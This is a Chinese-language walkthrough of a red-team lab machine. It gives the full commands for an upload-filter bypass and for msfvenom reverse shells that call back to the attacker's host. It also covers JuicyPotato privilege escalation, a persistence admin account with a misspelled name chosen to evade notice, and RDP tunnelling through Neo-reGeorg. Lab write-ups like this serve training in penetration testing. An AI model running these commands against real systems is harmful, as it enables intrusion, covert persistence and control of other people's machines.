HackMDJD – 紅隊演練基礎總結 靶機Walkthrough
枚舉
用rustscan可以發現對面開著Web Server.
rustscan 192.168.0.21 -- -sC -sV -o nmap_rust.sc
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
利用feroxbuster枚舉網站的路徑, 可以發現有幾個比較可疑的路徑.
feroxbuster -x php -x html -x txt -x sh -x jsp -x asp -x aspx -t 100 -u http://192.168.0.21 -o fer.sc
fileupload.aspx
tunnel.aspx
/upload
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
連上後發現是一個上傳檔案的頁面, 點開Browse以後會發現目標只接受Image類型的檔案.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
將Image Files改成All Files就能繞過這個限制了.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
在Auth Key輸入password後嘗試上傳, 發現上傳成功. 接著到/upload目錄下查看是否能讀到剛剛上傳的test.txt, 發現可以成功讀到.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
立足點
可以先用msfvenom生成一個reverse shell, 接著把這個檔案上傳到目標.
msfvenom -p windows/x64/shell_reverse_tcp -i 3 LHOST=192.168.0.17 LPORT=443 -f aspx -o rev.aspx
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
上傳完成後用curl戳一下剛剛上傳的reverse shell就成功RCE了.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
權限提升
由於我們的帳號還沒有管理員權限, 所以這邊需要做個權限提升.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
使用systeminfo和whoami /priv指令來調查可以發現兩個可能可以利用的立足點.
第一個可疑的點是系統的版本Windows Server 2012 R2 Standard, 第二個可疑的點是目前使用者的Security Token有SeAssignPrimaryTokenPrivilege和SeImpersonatePrivilege, 根據以上資訊可以合理判斷這邊應該能使用JuicyPotato來提權
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
先使用Impacket在本地打開SMB服務方便文件傳輸, 接著再將JuicyPotato複製過去.
Attacker:
impacket-smbserver meow . -smb2support
Victim:
copy \\192.168.0.17\meow\JuicyPotatox86.exe
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
由於JuicyPotato是以CLSID對應的權限執行檔案, 所以這邊也需要上傳一個exe的reverse shell, 讓JuicyPotato可以執行.
Attacker:
msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 LHOST=192.168.0.17 LPORT=443 -f exe -o rev.exe
impacket-smbserver meow . -smb2support
Victim:
copy \\192.168.0.17\meow\rev.exe
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
接著到這個網站找尋對應這個作業系統版本的CLSID表, 並將對應system權限的CLSID貼上執行, 最後就能成功收到有system權限的reverse shell了
JuicyPotatox86.exe -l 1337 -p rev.exe -t * -c {f3b4e234-7a68-4e43-b813-e4ba55a065f6}
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
後滲透
為了保持我們權限的持久化, 所以必須建立一個可供我們控制且擁有administrator權限的帳號.
這邊將名字取為adninistrator的原因是為了不讓原本的使用者能輕易發現多出了一個使用者引起懷疑.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
嘗試RDP上去, 但發現連接失敗, 這邊可以懷疑有可能是對方不開放對外網路連線.
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
剛剛在掃目錄的時候看到一個tunnel.aspx, 結合這次課程提到的Neo-reGeorg, 我們可以利用創建一個tunnel來讓請求從目標的本地發送出來, 或許可以繞過限制.
使用Neo-reGeorg內的neoreg.py讓本地通過tunnel.aspx與目標建立tunnel.
python neoreg.py -k password -u http://192.168.0.21/tunnel.aspx
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
接著使用proxychains4連接上目標的RDP, 將自己的RDP請求利用目標代理傳送到127.0.0.1. 連接上後輸入剛剛創建使用者的密碼後就能成功登入了.
proxychains4 rdesktop -u adninistrator 127.0.0.1
Image Not Showing
Possible Reasons
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
